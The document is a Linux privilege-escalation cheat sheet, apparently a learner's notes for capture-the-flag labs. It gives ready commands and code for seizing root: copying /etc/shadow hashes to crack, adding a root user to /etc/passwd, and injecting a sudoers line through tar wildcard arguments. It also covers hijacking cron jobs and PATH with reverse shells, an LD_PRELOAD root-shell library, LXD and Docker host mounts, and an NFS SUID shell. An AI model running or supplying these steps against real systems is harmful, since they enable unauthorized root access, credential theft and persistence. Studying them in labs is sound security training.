Manual Enumeration
Kernel Exploit
Uname -a
Cat /etc/lsb-release
get OS name and version and search for vulns
History, SSH and config files (part of cred hunting)
cat /home/user/.history
can you access another users directory and look at the .ssh directory ? - take the id_ras key and save on your system (give it chmod 600 permissions)
can you see a ovpn file? might be credentials there
Vulnerable Services
For example: Screen V4.5 is vulnerable. So check software
Also look for service where its running as ROOT and the root user for service does not have a password assigned.
Special Permissions - SUID/SGID
Setuid bit appears as “s” = executable bit set, “S” = exec not set
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -uid 0 -perm -6000 -type f 2>/dev/null – for groups
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Weak permissions 1:
- Can you read /etc/shadow ? - if so make a copy of root users hash - and then use John to crack it
Weak permissions 2:
- is /etc/passwd writeable?
generate new password hash using: openssl passwd <enter password>
edit the /etc/passwd enter the password between 1st and 2nd colon(:) ie replace the X
OR - you could just create a NEW ROOT user all together, using the format of root user in the /etc/passwd
Sudo right abuse
sudo -l
Cron Job
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null – Searching for writeable files
Might be able to add revere shell command to the .sh file
Crontab
cat /etc/crontab - view contents of crontab
locate script.sh - sometimes maybe deleted so you create own, or it may not show full path
- overwrite with a reverse shell command
CronJobs - PATH env variable:
- you notice that PATH variable starts with /home/user - so create a script.sh with contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
- make sure you chmod+x the file, wait for cronjob to run
- then /tmp/rootbash -p
Path Abuse
Should we want to replace “ls” binary with malicious script (ie reverse shell). We do this by adding a “.”to the path.
PATH=.:$PATH
Export PATH
Echo $PATH
Touch ls
Echo “reverse shell” > ls
Chmod +x ls
WildCard Abuse
* matches any number of characters in a file name
usage:
we find a backup.taz as /tmp/backup.tar.gz *
echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1
Credential Hunting
Shared Libraries
Static libraries = .a ext
Dynamically linked shared object libraries - .so ext
LD_PRELOAD priv esc:
File: root.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
Compile it:
gcc -fPIC -shared -o root.so root.c -nostartfiles
run it:
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
Shared Object Hijacking
Programs and binaries under development usually have custom libraries associated with them.
Privileged Groups
LXD similar to Docker.
Start LXD: lxd init
Import local image: lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
lxc init alpine r00t -c security.privileged=true
mount host file system: lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh
Docker
docker run -v /root:/mnt -it ubuntu.
Disk
with these privileges you can use debugfs to access the entire file system with root level privileges
ADM
Members of the adm group are able to read all logs stored in /var/log
NFS – Network File System
showmount -e 10.129.2.12 (look for no_root_squash)
cat /etc/exports
write shell.c file:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
On victim: gcc shell.c -o shell
On attacking: sudo mount -t nfs 10.129.2.12:/tmp /mnt
On attacking: cp shell /mnt
On attacking: chmod u+s /mnt/shell
On victim: ./shell
Abusing Shell Features - SUID/SGID executables
Part 1 and Part 2 - look at Task 14 and 15 on Try Hack Me - Linux Priv Esc